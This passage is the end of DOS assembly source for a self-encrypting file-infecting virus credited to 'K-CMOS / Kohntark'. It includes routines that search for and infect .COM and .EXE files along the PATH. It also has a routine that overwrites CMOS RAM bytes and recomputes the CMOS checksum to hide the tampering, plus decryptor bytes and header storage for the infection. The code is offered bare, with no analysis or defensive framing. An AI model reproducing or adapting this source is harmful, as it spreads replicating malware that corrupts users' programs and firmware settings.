|
cmp al,0 ;end of ASCIIZ string?
|
|
jne MOVE_ASCII_FILENAME ;keep on going
|
|
pop si ;restore si to use in the following
|
|
push bp ;save COM / EXE string pointer
|
|
call CHECK_N_INFECT_FILE ;check file if file found
|
|
pop bp ;restore COM / EXE string pointer
|
|
jnc EXITX
|
|
mov bx,si ;fix bx
|
|
push si ;save si again
|
|
mov ah,04Fh
|
|
jmp short FIND_NEXT_FILE
|
|
|
|
EXIT:
|
|
pop si
|
|
EXITX:
|
|
ret
|
|
|
|
;==============================================================================
|
|
CMOS_CHCKSM:
|
|
|
|
; INPUT:
|
|
; DL = CMOS ADDRESS of BYTE TO be MODiFiED
|
|
; BL = NEW BYTE VALUE to be PUT IN CMOS RAM
|
|
|
|
; OUTPUT:
|
|
; None.
|
|
; REGISTERS USED: AX,CX,BX,DX
|
|
|
|
;*************************
|
|
; GET CMOS Checksum => CX
|
|
;*************************
|
|
|
|
xor ax,ax
|
|
mov al,2Eh ;msb of checksum address
|
|
out 70h,al ;send address / control byte
|
|
in al,71h ;read byte
|
|
|
|
xchg ch,al ;store al in ch
|
|
|
|
mov al,2Fh ;lsb of checksum address
|
|
out 70h,al ;send address / control byte
|
|
in al,71h ;read byte
|
|
|
|
xchg cl,al ;store lsb to cl
|
|
|
|
;*********************
|
|
; Fix CMOS Checksum
|
|
;*********************
|
|
|
|
push dx
|
|
xchg dl,al ;AL = address
|
|
out 70h,al ;send address / control byte
|
|
in al,71h ;read register
|
|
|
|
sub cx,ax ;subtract from checksum
|
|
|
|
add cx,bx ;update checksum value in register.
|
|
|
|
;****************************
|
|
; Write CMOS byte to Address
|
|
;****************************
|
|
|
|
pop dx
|
|
xchg dl,al ;AL = address
|
|
out 70h,al ;specify CMOS address
|
|
xchg al,bl ;new CMOS value => al
|
|
|
|
out 71h,al ;write new CMOS byte
|
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;*********************
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; Write CMOS Checksum
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;*********************
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mov al,2Eh ;address of checksum 's msb
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out 70h,al ;specify CMOS address
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xchg al,ch ;msb of new checksum
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out 71h,al ;write new CMOS msb
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mov al,2Fh ;address of checksum 's lsb
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out 70h,al ;specify CMOS address
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xchg al,cl ;lsb of new checksum
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out 71h,al ;write new CMOS lsb
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ret
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;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
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NAME_AUTHOR db 'K-CM”S / K”hntark'
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WORK_BUFFER db 0B9h,00,00 ;mov cx,VSIZE
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db 0BBh,00,00 ;mov si,VADDRESS
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db 02Eh,081h,07,00,00 ;add WORD PTR cs:[si],KEY
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db 083h,0C3h,02 ;add si,02
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;db 043h,043h ;inc bx, inc bx
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db 0E2h,0F6h ;loop add..
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COM_MASK db '*.COM',0
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EXE_MASK db '*.EXE',0
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PATH_STR db 'PATH=',0
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START_IMAGE db 0E9h,0,0,020h
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ORIG_SSSP dw 0,0
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ORIG_IPCS dw 0,0
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COM_FLAG db 0 ;0=COM 1=EXE
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START_CODE db 4 dup (90h) ;4 bytes of COM or EXE hdr goes here
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;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
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|
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FINAL: ;label of byte of code to be kept in virus when it moves
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;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
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HEAP:
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START_CODE2 db 24d dup (0) ;2nd part of EXE hdr
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PSP_SEG dw 0
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PATH_ADDRESS dw 0
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FILENAME_PTR dw 0
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WORK_AREA db 64 DUP (0),'$'
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DTA db 21 dup(0) ;reserved
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DTA_File_Attr db ?
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DTA_File_Time dw ?
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DTA_File_Date dw ?
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DTA_File_Size dd ?
|
|
DTA_File_Name db 13 dup(0)
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;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
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|
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ID equ 77h
|
|
DECRYPTOR_SIZE equ 16d ; equ OFFSET WORK_BUFFER - OFFSET START_IMAGE
|
|
|
|
MAIN ENDS
|
|
END HOST
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